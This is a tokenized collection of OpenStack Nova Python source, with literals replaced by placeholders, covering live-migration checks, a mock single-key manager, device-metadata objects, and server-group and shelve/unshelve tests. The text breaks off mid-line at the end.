ram_allocation_ratio <EOL> avail = total_ram_mb * ram_ratio - ( total_ram_mb - free_ram_mb ) <EOL> if not mem_inst or avail <= mem_inst : <EOL> instance_uuid = self . instance . uuid <EOL> dest = self . destination <EOL> reason = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> raise exception . MigrationPreCheckError ( reason = reason % dict ( <EOL> instance_uuid = instance_uuid , dest = dest , avail = avail , <EOL> mem_inst = mem_inst ) ) <EOL> def _get_compute_info ( self , host ) : <EOL> return objects . ComputeNode . get_first_node_by_host_for_old_compat ( <EOL> self . context , host ) <EOL> def _check_compatible_with_source_hypervisor ( self , destination ) : <EOL> source_info = self . _get_compute_info ( self . source ) <EOL> destination_info = self . _get_compute_info ( destination ) <EOL> source_type = source_info . hypervisor_type <EOL> destination_type = destination_info . hypervisor_type <EOL> if source_type != destination_type : <EOL> raise exception . InvalidHypervisorType ( ) <EOL> source_version = source_info . hypervisor_version <EOL> destination_version = destination_info . hypervisor_version <EOL> if source_version > destination_version : <EOL> raise exception . DestinationHypervisorTooOld ( ) <EOL> def _call_livem_checks_on_host ( self , destination ) : <EOL> try : <EOL> self . migrate_data = self . compute_rpcapi . check_can_live_migrate_destination ( self . context , self . instance , <EOL> destination , self . block_migration , self . disk_over_commit ) <EOL> except messaging . MessagingTimeout : <EOL> msg = _ ( "<STR_LIT>" <EOL> "<STR_LIT:%s>" ) % destination <EOL> raise exception . MigrationPreCheckError ( msg ) <EOL> def _find_destination ( self ) : <EOL> attempted_hosts = [ self . source ] <EOL> image = utils . get_image_from_system_metadata ( <EOL> self . instance . system_metadata ) <EOL> filter_properties = { '<STR_LIT>' : attempted_hosts } <EOL> request_spec = { '<STR_LIT>' : { '<STR_LIT>' : self . instance . uuid } } <EOL> scheduler_utils . setup_instance_group ( self . context , request_spec , <EOL> filter_properties ) <EOL> if not self . request_spec : <EOL> request_spec = objects . RequestSpec . from_components ( <EOL> self . context , self . instance . uuid , image , <EOL> self . instance . flavor , self . instance . numa_topology , <EOL> self . instance . pci_requests , <EOL> filter_properties , None , self . instance . availability_zone <EOL> ) <EOL> else : <EOL> request_spec = self . request_spec <EOL> request_spec . reset_forced_destinations ( ) <EOL> host = None <EOL> while host is None : <EOL> self . _check_not_over_max_retries ( attempted_hosts ) <EOL> request_spec . ignore_hosts = attempted_hosts <EOL> try : <EOL> host = self . scheduler_client . select_destinations ( self . context , <EOL> request_spec ) [ <NUM_LIT:0> ] [ '<STR_LIT:host>' ] <EOL> except messaging . RemoteError as ex : <EOL> raise exception . MigrationSchedulerRPCError ( <EOL> reason = six . text_type ( ex ) ) <EOL> try : <EOL> self . _check_compatible_with_source_hypervisor ( host ) <EOL> self . _call_livem_checks_on_host ( host ) <EOL> except ( exception . Invalid , exception . MigrationPreCheckError ) as e : <EOL> LOG . debug ( "<STR_LIT>" , <EOL> { "<STR_LIT:host>" : host , "<STR_LIT:e>" : e } ) <EOL> attempted_hosts . append ( host ) <EOL> host = None <EOL> return host <EOL> def _check_not_over_max_retries ( self , attempted_hosts ) : <EOL> if CONF . migrate_max_retries == - <NUM_LIT:1> : <EOL> return <EOL> retries = len ( attempted_hosts ) - <NUM_LIT:1> <EOL> if retries > CONF . migrate_max_retries : <EOL> if self . migration : <EOL> self . migration . status = '<STR_LIT>' <EOL> self . migration . save ( ) <EOL> msg = ( _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> % { '<STR_LIT>' : retries , <EOL> '<STR_LIT>' : self . instance . uuid } ) <EOL> raise exception . MaxRetriesExceeded ( reason = msg ) </s>
<s> from oslo_service import sslutils <EOL> def register_opts ( conf ) : <EOL> sslutils . register_opts ( conf ) <EOL> def list_opts ( ) : <EOL> return sslutils . list_opts ( ) </s>
<s> """<STR_LIT>""" <EOL> from oslo_log import log as logging <EOL> from nova import exception <EOL> from nova . i18n import _ , _LW <EOL> from nova . keymgr import mock_key_mgr <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class SingleKeyManager ( mock_key_mgr . MockKeyManager ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> LOG . warning ( _LW ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> super ( SingleKeyManager , self ) . __init__ ( ) <EOL> self . key_id = '<STR_LIT>' <EOL> self . key = self . _generate_key ( key_length = <NUM_LIT> ) <EOL> self . keys [ self . key_id ] = self . key <EOL> def _generate_hex_key ( self , ** kwargs ) : <EOL> key_length = kwargs . get ( '<STR_LIT>' , <NUM_LIT> ) <EOL> return b'<STR_LIT:0>' * ( key_length // <NUM_LIT:4> ) <EOL> def _generate_key_id ( self ) : <EOL> return self . key_id <EOL> def store_key ( self , ctxt , key , ** kwargs ) : <EOL> if key != self . key : <EOL> raise exception . KeyManagerError ( <EOL> reason = _ ( "<STR_LIT>" ) ) <EOL> return super ( SingleKeyManager , self ) . store_key ( ctxt , key , ** kwargs ) <EOL> def delete_key ( self , ctxt , key_id , ** kwargs ) : <EOL> if ctxt is None : <EOL> raise exception . Forbidden ( ) <EOL> if key_id != self . key_id : <EOL> raise exception . KeyManagerError ( <EOL> reason = _ ( "<STR_LIT>" ) ) <EOL> LOG . warning ( _LW ( "<STR_LIT>" ) , key_id ) </s>
<s> from nova . objects import base <EOL> from nova . objects import fields <EOL> @ base . NovaObjectRegistry . register_if ( False ) <EOL> class DeviceBus ( base . NovaObject ) : <EOL> VERSION = '<STR_LIT:1.0>' <EOL> @ base . NovaObjectRegistry . register <EOL> class PCIDeviceBus ( DeviceBus ) : <EOL> VERSION = '<STR_LIT:1.0>' <EOL> fields = { <EOL> '<STR_LIT:address>' : fields . PCIAddressField ( ) , <EOL> } <EOL> @ base . NovaObjectRegistry . register <EOL> class USBDeviceBus ( DeviceBus ) : <EOL> VERSION = '<STR_LIT:1.0>' <EOL> fields = { <EOL> '<STR_LIT:address>' : fields . USBAddressField ( ) , <EOL> } <EOL> @ base . NovaObjectRegistry . register <EOL> class SCSIDeviceBus ( DeviceBus ) : <EOL> VERSION = '<STR_LIT:1.0>' <EOL> fields = { <EOL> '<STR_LIT:address>' : fields . SCSIAddressField ( ) , <EOL> } <EOL> @ base . NovaObjectRegistry . register <EOL> class IDEDeviceBus ( DeviceBus ) : <EOL> VERSION = '<STR_LIT:1.0>' <EOL> fields = { <EOL> '<STR_LIT:address>' : fields . IDEAddressField ( ) , <EOL> } <EOL> @ base . NovaObjectRegistry . register <EOL> class DeviceMetadata ( base . NovaObject ) : <EOL> VERSION = '<STR_LIT:1.0>' <EOL> fields = { <EOL> '<STR_LIT>' : fields . ObjectField ( "<STR_LIT>" , subclasses = True ) , <EOL> '<STR_LIT>' : fields . ListOfStringsField ( ) , <EOL> } <EOL> @ base . NovaObjectRegistry . register <EOL> class NetworkInterfaceMetadata ( DeviceMetadata ) : <EOL> VERSION = '<STR_LIT:1.0>' <EOL> fields = { <EOL> '<STR_LIT>' : fields . MACAddressField ( ) , <EOL> } <EOL> @ base . NovaObjectRegistry . register <EOL> class DiskMetadata ( DeviceMetadata ) : <EOL> VERSION = '<STR_LIT:1.0>' <EOL> fields = { <EOL> '<STR_LIT>' : fields . StringField ( nullable = True ) , <EOL> '<STR_LIT:path>' : fields . StringField ( nullable = True ) , <EOL> } <EOL> @ base . NovaObjectRegistry . register <EOL> class DeviceMetadataList ( base . ObjectListBase , base . NovaObject ) : <EOL> VERSION = '<STR_LIT:1.0>' <EOL> fields = { <EOL> '<STR_LIT>' : fields . ListOfObjectsField ( '<STR_LIT>' , <EOL> subclasses = True ) , <EOL> } </s>
<s> from oslo_config import cfg <EOL> import nova . scheduler . utils <EOL> import nova . servicegroup <EOL> from nova import test <EOL> from nova . tests import fixtures as nova_fixtures <EOL> from nova . tests . functional . api import client <EOL> import nova . tests . unit . image . fake <EOL> from nova . tests . unit import policy_fixture <EOL> CONF = cfg . CONF <EOL> class TestServerValidation ( test . TestCase ) : <EOL> REQUIRES_LOCKING = True <EOL> microversion = None <EOL> def setUp ( self ) : <EOL> super ( TestServerValidation , self ) . setUp ( ) <EOL> self . useFixture ( policy_fixture . RealPolicyFixture ( ) ) <EOL> api_fixture = self . useFixture ( nova_fixtures . OSAPIFixture ( <EOL> api_version = '<STR_LIT>' ) ) <EOL> nova . tests . unit . image . fake . stub_out_image_service ( self ) <EOL> self . addCleanup ( nova . tests . unit . image . fake . FakeImageService_reset ) <EOL> self . api = api_fixture . api <EOL> self . image_id = self . api . get_images ( ) [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] <EOL> self . flavor_id = self . api . get_flavors ( ) [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] <EOL> def test_name_validation ( self ) : <EOL> """<STR_LIT>""" <EOL> server = dict ( name = '<STR_LIT>' , <EOL> imageRef = self . image_id , <EOL> flavorRef = self . flavor_id ) <EOL> server_args = { '<STR_LIT>' : server } <EOL> self . assertRaises ( client . OpenStackApiException , self . api . post_server , <EOL> server_args ) </s>
<s> from oslo_config import cfg <EOL> from oslo_utils import uuidutils <EOL> import webob <EOL> from nova . api . openstack . compute . legacy_v2 . contrib import server_groups <EOL> from nova . api . openstack . compute import server_groups as sg_v21 <EOL> from nova . api . openstack import extensions <EOL> from nova import context <EOL> from nova import quota <EOL> from nova import test <EOL> from nova . tests . unit . api . openstack import fakes <EOL> from nova . tests import uuidsentinel as uuids <EOL> CONF = cfg . CONF <EOL> class AttrDict ( dict ) : <EOL> def __getattr__ ( self , k ) : <EOL> return self [ k ] <EOL> def server_group_template ( ** kwargs ) : <EOL> sgroup = kwargs . copy ( ) <EOL> sgroup . setdefault ( '<STR_LIT:name>' , '<STR_LIT:test>' ) <EOL> return sgroup <EOL> def server_group_db ( sg ) : <EOL> attrs = sg . copy ( ) <EOL> if '<STR_LIT:id>' in attrs : <EOL> attrs [ '<STR_LIT>' ] = attrs . pop ( '<STR_LIT:id>' ) <EOL> if '<STR_LIT>' in attrs : <EOL> policies = attrs . pop ( '<STR_LIT>' ) <EOL> attrs [ '<STR_LIT>' ] = policies <EOL> else : <EOL> attrs [ '<STR_LIT>' ] = [ ] <EOL> if '<STR_LIT>' in attrs : <EOL> members = attrs . pop ( '<STR_LIT>' ) <EOL> attrs [ '<STR_LIT>' ] = members <EOL> else : <EOL> attrs [ '<STR_LIT>' ] = [ ] <EOL> if '<STR_LIT>' in attrs : <EOL> attrs [ '<STR_LIT>' ] = attrs . pop ( '<STR_LIT>' ) <EOL> else : <EOL> attrs [ '<STR_LIT>' ] = { } <EOL> attrs [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> attrs [ '<STR_LIT>' ] = None <EOL> attrs [ '<STR_LIT>' ] = None <EOL> attrs [ '<STR_LIT>' ] = None <EOL> if '<STR_LIT>' not in attrs : <EOL> attrs [ '<STR_LIT>' ] = fakes . FAKE_USER_ID <EOL> if '<STR_LIT>' not in attrs : <EOL> attrs [ '<STR_LIT>' ] = fakes . FAKE_PROJECT_ID <EOL> attrs [ '<STR_LIT:id>' ] = <NUM_LIT:7> <EOL> return AttrDict ( attrs ) <EOL> class ServerGroupQuotasTestV21 ( test . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( ServerGroupQuotasTestV21 , self ) . setUp ( ) <EOL> self . _setup_controller ( ) <EOL> self . req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> def _setup_controller ( self ) : <EOL> self . controller = sg_v21 . ServerGroupController ( ) <EOL> def _setup_quotas ( self ) : <EOL> pass <EOL> def _assert_server_groups_in_use ( self , project_id , user_id , in_use ) : <EOL> ctxt = context . get_admin_context ( ) <EOL> result = quota . QUOTAS . get_user_quotas ( ctxt , project_id , user_id ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] [ '<STR_LIT>' ] , in_use ) <EOL> def test_create_server_group_normal ( self ) : <EOL> self . _setup_quotas ( ) <EOL> sgroup = server_group_template ( ) <EOL> policies = [ '<STR_LIT>' ] <EOL> sgroup [ '<STR_LIT>' ] = policies <EOL> res_dict = self . controller . create ( self . req , <EOL> body = { '<STR_LIT>' : sgroup } ) <EOL> self . assertEqual ( res_dict [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] , '<STR_LIT:test>' ) <EOL> self . assertTrue ( uuidutils . is_uuid_like ( res_dict [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] ) ) <EOL> self . assertEqual ( res_dict [ '<STR_LIT>' ] [ '<STR_LIT>' ] , policies ) <EOL> def test_create_server_group_quota_limit ( self ) : <EOL> self . _setup_quotas ( ) <EOL> sgroup = server_group_template ( ) <EOL> policies = [ '<STR_LIT>' ] <EOL> sgroup [ '<STR_LIT>' ] = policies <EOL> for i in range ( CONF . quota_server_groups ) : <EOL> self . controller . create ( self . req , body = { '<STR_LIT>' : sgroup } ) <EOL> self . assertRaises ( webob . exc . HTTPForbidden , <EOL> self . controller . create , <EOL> self . req , body = { '<STR_LIT>' : sgroup } ) <EOL> def test_delete_server_group_by_admin ( self ) : <EOL> self . _setup_quotas ( ) <EOL> sgroup = server_group_template ( ) <EOL> policies = [ '<STR_LIT>' ] <EOL> sgroup [ '<STR_LIT>' ] = policies <EOL> res = self . controller . create ( self . req , body = { '<STR_LIT>' : sgroup } ) <EOL> sg_id = res [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> context = self . req . environ [ '<STR_LIT>' ] <EOL> self . _assert_server_groups_in_use ( context . project_id , <EOL> context . user_id , <NUM_LIT:1> ) <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' , use_admin_context = True ) <EOL> self . controller . delete ( req , sg_id ) <EOL> self . _assert_server_groups_in_use ( context . project_id , <EOL> context . user_id , <NUM_LIT:0> ) <EOL> def test_delete_server_group_by_id ( self ) : <EOL> self . _setup_quotas ( ) <EOL> sg = server_group_template ( id = uuids . sg1_id ) <EOL> self . called = False <EOL> def server_group_delete ( context , id ) : <EOL> self . called = True <EOL> def return_server_group ( context , group_id ) : <EOL> self . assertEqual ( sg [ '<STR_LIT:id>' ] , group_id ) <EOL> return server_group_db ( sg ) <EOL> self . stub_out ( '<STR_LIT>' , <EOL> server_group_delete ) <EOL> self . stub_out ( '<STR_LIT>' , <EOL> return_server_group ) <EOL> resp = self . controller . delete ( self . req , uuids . sg1_id ) <EOL> self . assertTrue ( self . called ) <EOL> if isinstance ( self . controller , sg_v21 . ServerGroupController ) : <EOL> status_int = self . controller . delete . wsgi_code <EOL> else : <EOL> status_int = resp . status_int <EOL> self . assertEqual ( <NUM_LIT> , status_int ) <EOL> class ServerGroupQuotasTestV2 ( ServerGroupQuotasTestV21 ) : <EOL> def _setup_controller ( self ) : <EOL> self . ext_mgr = self . mox . CreateMock ( extensions . ExtensionManager ) <EOL> self . controller = server_groups . ServerGroupController ( self . ext_mgr ) <EOL> def _setup_quotas ( self ) : <EOL> self . ext_mgr . is_loaded ( '<STR_LIT>' ) . MultipleTimes ( ) . AndReturn ( True ) <EOL> self . mox . ReplayAll ( ) </s>
<s> import mock <EOL> from mox3 import mox <EOL> from oslo_utils import fixture as utils_fixture <EOL> from oslo_utils import timeutils <EOL> from nova . compute import claims <EOL> from nova . compute import task_states <EOL> from nova . compute import vm_states <EOL> import nova . conf <EOL> from nova import db <EOL> from nova import objects <EOL> from nova . tests . unit . compute import test_compute <EOL> from nova . tests . unit . image import fake as fake_image <EOL> from nova . tests import uuidsentinel as uuids <EOL> CONF = nova . conf . CONF <EOL> def _fake_resources ( ) : <EOL> resources = { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:20> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:20> , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : <NUM_LIT:0> <EOL> } <EOL> return objects . ComputeNode ( ** resources ) <EOL> class ShelveComputeManagerTestCase ( test_compute . BaseTestCase ) : <EOL> def _shelve_instance ( self , shelved_offload_time , clean_shutdown = True ) : <EOL> CONF . set_override ( '<STR_LIT>' , shelved_offload_time ) <EOL> host = '<STR_LIT>' <EOL> instance = self . _create_fake_instance_obj ( params = { '<STR_LIT:host>' : host } ) <EOL> image_id = '<STR_LIT>' <EOL> host = '<STR_LIT>' <EOL> self . useFixture ( utils_fixture . TimeFixture ( ) ) <EOL> instance . task_state = task_states . SHELVING <EOL> instance . save ( ) <EOL> self . mox . StubOutWithMock ( self . compute , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . compute . driver , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . compute . driver , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . compute , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . compute . network_api , <EOL> '<STR_LIT>' ) <EOL> self . compute . _notify_about_instance_usage ( self . context , instance , <EOL> '<STR_LIT>' ) <EOL> if clean_shutdown : <EOL> self . compute . driver . power_off ( instance , <EOL> CONF . shutdown_timeout , <EOL> self . compute . SHUTDOWN_RETRY_INTERVAL ) <EOL> else : <EOL> self . compute . driver . power_off ( instance , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . compute . _get_power_state ( self . context , <EOL> instance ) . AndReturn ( <NUM_LIT> ) <EOL> if CONF . shelved_offload_time == <NUM_LIT:0> : <EOL> self . compute . network_api . cleanup_instance_network_on_host ( <EOL> self . context , instance , instance . host ) <EOL> self . compute . driver . snapshot ( self . context , instance , '<STR_LIT>' , <EOL> mox . IgnoreArg ( ) ) <EOL> tracking = { '<STR_LIT>' : instance . vm_state } <EOL> def check_save ( expected_task_state = None ) : <EOL> self . assertEqual ( <NUM_LIT> , instance . power_state ) <EOL> if tracking [ '<STR_LIT>' ] == vm_states . ACTIVE : <EOL> if CONF . shelved_offload_time == <NUM_LIT:0> : <EOL> self . assertEqual ( task_states . SHELVING_OFFLOADING , <EOL> instance . task_state ) <EOL> else : <EOL> self . assertIsNone ( instance . task_state ) <EOL> self . assertEqual ( vm_states . SHELVED , instance . vm_state ) <EOL> self . assertEqual ( [ task_states . SHELVING , <EOL> task_states . SHELVING_IMAGE_UPLOADING ] , <EOL> expected_task_state ) <EOL> self . assertIn ( '<STR_LIT>' , instance . system_metadata ) <EOL> self . assertEqual ( image_id , <EOL> instance . system_metadata [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( host , <EOL> instance . system_metadata [ '<STR_LIT>' ] ) <EOL> tracking [ '<STR_LIT>' ] = instance . vm_state <EOL> elif ( tracking [ '<STR_LIT>' ] == vm_states . SHELVED and <EOL> CONF . shelved_offload_time == <NUM_LIT:0> ) : <EOL> self . assertIsNone ( instance . host ) <EOL> self . assertIsNone ( instance . node ) <EOL> self . assertIsNone ( instance . task_state ) <EOL> self . assertEqual ( vm_states . SHELVED_OFFLOADED , <EOL> instance . vm_state ) <EOL> self . assertEqual ( [ task_states . SHELVING , <EOL> task_states . SHELVING_OFFLOADING ] , <EOL> expected_task_state ) <EOL> tracking [ '<STR_LIT>' ] = instance . vm_state <EOL> else : <EOL> self . fail ( '<STR_LIT>' ) <EOL> self . compute . _notify_about_instance_usage ( self . context , <EOL> instance , '<STR_LIT>' ) <EOL> if CONF . shelved_offload_time == <NUM_LIT:0> : <EOL> self . compute . _notify_about_instance_usage ( self . context , instance , <EOL> '<STR_LIT>' ) <EOL> self . compute . driver . power_off ( instance , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . compute . _get_power_state ( self . context , <EOL> instance ) . AndReturn ( <NUM_LIT> ) <EOL> self . compute . _notify_about_instance_usage ( self . context , instance , <EOL> '<STR_LIT>' ) <EOL> self . mox . ReplayAll ( ) <EOL> with mock . patch . object ( instance , '<STR_LIT>' ) as mock_save : <EOL> mock_save . side_effect = check_save <EOL> self . compute . shelve_instance ( self . context , instance , <EOL> image_id = image_id , clean_shutdown = clean_shutdown ) <EOL> def test_shelve ( self ) : <EOL> self . _shelve_instance ( - <NUM_LIT:1> ) <EOL> def test_shelve_forced_shutdown ( self ) : <EOL> self . _shelve_instance ( - <NUM_LIT:1> , clean_shutdown = False ) <EOL> def test_shelve_and_offload ( self ) : <EOL> self . _shelve_instance ( <NUM_LIT:0> ) <EOL> def _shelve_offload ( self , clean_shutdown = True ) : <EOL> host = '<STR_LIT>' <EOL> instance = self . _create_fake_instance_obj ( params = { '<STR_LIT:host>' : host } ) <EOL> instance . task_state = task_states . SHELVING <EOL> instance . save ( ) <EOL> self . useFixture ( utils_fixture . TimeFixture ( ) ) <EOL> self . mox . StubOutWithMock ( self . compute , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . compute . driver , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . compute , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . compute . network_api , <EOL> '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . compute , '<STR_LIT>' ) <EOL> self . compute . _notify_about_instance_usage ( self . context , instance , <EOL> '<STR_LIT>' ) <EOL> if clean_shutdown : <EOL> self . compute . driver . power_off ( instance , <EOL> CONF . shutdown_timeout , <EOL> self . compute . SHUTDOWN_RETRY_INTERVAL ) <EOL> else : <EOL> self . compute . driver . power_off ( instance , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . compute . network_api . cleanup_instance_network_on_host ( <EOL> self . context , instance , instance . host ) <EOL> self . compute . _get_power_state ( self . context , <EOL> instance ) . AndReturn ( <NUM_LIT> ) <EOL> self . compute . _update_resource_tracker ( self . context , instance ) <EOL> self . compute . _notify_about_instance_usage ( self . context , instance , <EOL> '<STR_LIT>' ) <EOL> self . mox . ReplayAll ( ) <EOL> with mock . patch . object ( instance , '<STR_LIT>' ) : <EOL> self . compute . shelve_offload_instance ( self . context , instance , <EOL> clean_shutdown = clean_shutdown ) <EOL> self . assertEqual ( vm_states . SHELVED_OFFLOADED , instance . vm_state ) <EOL> self . assertIsNone ( instance . task_state ) <EOL> def test_shelve_offload ( self ) : <EOL> self . _shelve_offload ( ) <EOL> def test_shelve_offload_forced_shutdown ( self ) : <EOL> self . _shelve_offload ( clean_shutdown = False ) <EOL> def test_unshelve ( self ) : <EOL> instance = self . _create_fake_instance_obj ( ) <EOL> instance . task_state = task_states . UNSHELVING <EOL> instance . save ( ) <EOL> image = { '<STR_LIT:id>' : uuids . image_id } <EOL> node = test_compute . NODENAME <EOL> limits = { } <EOL> filter_properties = { '<STR_LIT>' : limits } <EOL> host = '<STR_LIT>' <EOL> cur_time = timeutils . utcnow ( ) <EOL> sys_meta = dict ( instance . system_metadata ) <EOL> sys_meta [ '<STR_LIT>' ] = cur_time . isoformat ( ) <EOL> sys_meta [ '<STR_LIT>' ] = image [ '<STR_LIT:id>' ] <EOL> sys_meta [ '<STR_LIT>' ] = host <EOL> instance . system_metadata = sys_meta <EOL> self . mox . StubOutWithMock ( self . compute , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . compute , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . compute . driver , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . compute , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . rt , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . compute . network_api , <EOL> '<STR_LIT>' ) <EOL> self . deleted_image_id = None <EOL> def fake_delete ( self2 , ctxt , image_id ) : <EOL> self . deleted_image_id = image_id <EOL> def fake_claim ( context , instance , limits ) : <EOL> instance . host = self . compute . host <EOL> return claims . Claim ( context , instance , <EOL> self . rt , _fake_resources ( ) ) <EOL> tracking = { <EOL> '<STR_LIT>' : instance . task_state , <EOL> '<STR_LIT>' : False , <EOL> } <EOL> def check_save ( expected_task_state = None ) : <EOL> if tracking [ '<STR_LIT>' ] == task_states . UNSHELVING : <EOL> if tracking [ '<STR_LIT>' ] : <EOL> self . assertIsNone ( instance . task_state ) <EOL> else : <EOL> self . assertEqual ( task_states . SPAWNING , instance . task_state ) <EOL> tracking [ '<STR_LIT>' ] = True <EOL> tracking [ '<STR_LIT>' ] == instance . task_state <EOL> elif tracking [ '<STR_LIT>' ] == task_states . SPAWNING : <EOL> self . assertEqual ( vm_states . ACTIVE , instance . vm_state ) <EOL> tracking [ '<STR_LIT>' ] == instance . task_state <EOL> else : <EOL> self . fail ( '<STR_LIT>' ) <EOL> fake_image . stub_out_image_service ( self ) <EOL> self . stubs . Set ( fake_image . _FakeImageService , '<STR_LIT>' , fake_delete ) <EOL> self . compute . _notify_about_instance_usage ( self . context , instance , <EOL> '<STR_LIT>' ) <EOL> self . compute . _prep_block_device ( self . context , instance , <EOL> mox . IgnoreArg ( ) , do_check_attach = False ) . AndReturn ( '<STR_LIT>' ) <EOL> self . compute . network_api . setup_instance_network_on_host ( <EOL> self . context , instance , self . compute . host ) <EOL> self . compute . driver . spawn ( self . context , instance , <EOL> mox . IsA ( objects . ImageMeta ) , <EOL> injected_files = [ ] , admin_password = None , <EOL> network_info = [ ] , <EOL> block_device_info = '<STR_LIT>' ) <EOL> self . compute . _get_power_state ( self . context , instance ) . AndReturn ( <NUM_LIT> ) <EOL> self . compute . _notify_about_instance_usage ( self . context , instance , <EOL> '<STR_LIT>' ) <EOL> self . mox . ReplayAll ( ) <EOL> with mock . patch . object ( self . rt , '<STR_LIT>' , <EOL> side_effect = fake_claim ) , mock . patch . object ( instance , '<STR_LIT>' ) as mock_save : <EOL> mock_save . side_effect = check_save <EOL> self . compute . unshelve_instance ( <EOL> self . context , instance , image = image , <EOL> filter_properties = filter_properties , <EOL> node = node ) <EOL> self . assertNotIn ( '<STR_LIT>' , instance . system_metadata ) <EOL> self . assertNotIn ( '<STR_LIT>' , instance . system_metadata ) <EOL> self . assertNotIn ( '<STR_LIT>' , instance . system_metadata ) <EOL> self . assertEqual ( image [ '<STR_LIT:id>' ] , self . deleted_image_id ) <EOL> self . assertEqual ( instance . host , self . compute . host ) <EOL> self . assertEqual ( <NUM_LIT> , instance . power_state ) <EOL> self . assertEqual ( vm_states . ACTIVE , instance . vm_state ) <EOL> self . assertIsNone ( instance . task_state ) <EOL> self . assertIsNone ( instance . key_data ) <EOL> self . assertEqual ( self . compute . host , instance . host ) <EOL> self . assertFalse ( instance . auto_disk_config ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_unshelve_volume_backed ( self , mock_image_meta ) : <EOL> instance = self . _create_fake_instance_obj ( ) <EOL> node = test_compute . NODENAME <EOL> limits = { } <EOL> filter_properties = { '<STR_LIT>' : limits } <EOL> instance . task_state = task_states . UNSHELVING <EOL> instance . save ( ) <EOL> image_meta = { '<STR_LIT>' : { '<STR_LIT>' : uuids . image_id } } <EOL> mock_image_meta . return_value = image_meta <EOL> self . mox . StubOutWithMock ( self . compute , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . compute , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . compute . driver , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . compute , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . rt , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . compute . network_api , <EOL> '<STR_LIT>' ) <EOL> tracking = { '<STR_LIT>' : instance . task_state } <EOL> def check_save ( expected_task_state = None ) : <EOL> if tracking [ '<STR_LIT>' ] == task_states . UNSHELVING : <EOL> self . assertEqual ( task_states . SPAWNING , instance . task_state ) <EOL> tracking [ '<STR_LIT>' ] = instance . task_state <EOL> elif tracking [ '<STR_LIT>' ] == task_states . SPAWNING : <EOL> self . assertEqual ( <NUM_LIT> , instance . power_state ) <EOL> self . assertEqual ( vm_states . ACTIVE , instance . vm_state ) <EOL> self . assertIsNone ( instance . task_state ) <EOL> self . assertIsNone ( instance . key_data ) <EOL> self . assertFalse ( instance . auto_disk_config ) <EOL> self . assertIsNone ( instance . task_state ) <EOL> tracking [ '<STR_LIT>' ] = instance . task_state <EOL> else : <EOL> self . fail ( '<STR_LIT>' ) <EOL> self . compute . _notify_about_instance_usage ( self . context , instance , <EOL> '<STR_LIT>' ) <EOL> self . compute . _prep_block_device ( self . context , instance , <EOL> mox . IgnoreArg ( ) , do_check_attach = False ) . AndReturn ( '<STR_LIT>' ) <EOL> self . compute . network_api . setup_instance_network_on_host ( <EOL> self . context , instance , self . compute . host ) <EOL> self . rt . instance_claim ( self . context , instance , limits ) . AndReturn ( <EOL> claims . Claim ( self . context , instance , self . rt , <EOL> _fake_resources ( ) ) ) <EOL> self . compute . driver . spawn ( self . context , instance , <EOL> mox . IsA ( objects . ImageMeta ) , <EOL> injected_files = [ ] , admin_password = None , <EOL> network_info = [ ] , <EOL> block_device_info = '<STR_LIT>' ) <EOL> self . compute . _get_power_state ( self . context , instance ) . AndReturn ( <NUM_LIT> ) <EOL> self . compute . _notify_about_instance_usage ( self . context , instance , <EOL> '<STR_LIT>' ) <EOL> self . mox . ReplayAll ( ) <EOL> with mock . patch . object ( instance , '<STR_LIT>' ) as mock_save : <EOL> mock_save . side_effect = check_save <EOL> self . compute . unshelve_instance ( self . context , instance , image = None , <EOL> filter_properties = filter_properties , node = node ) <EOL> @ mock . patch . object ( objects . InstanceList , '<STR_LIT>' ) <EOL> def test_shelved_poll_none_offloaded ( self , mock_get_by_filters ) : <EOL> self . flags ( shelved_offload_time = - <NUM_LIT:1> ) <EOL> self . compute . _poll_shelved_instances ( self . context ) <EOL> self . assertEqual ( <NUM_LIT:0> , mock_get_by_filters . call_count ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_shelved_poll_none_exist ( self , mock_older ) : <EOL> self . flags ( shelved_offload_time = 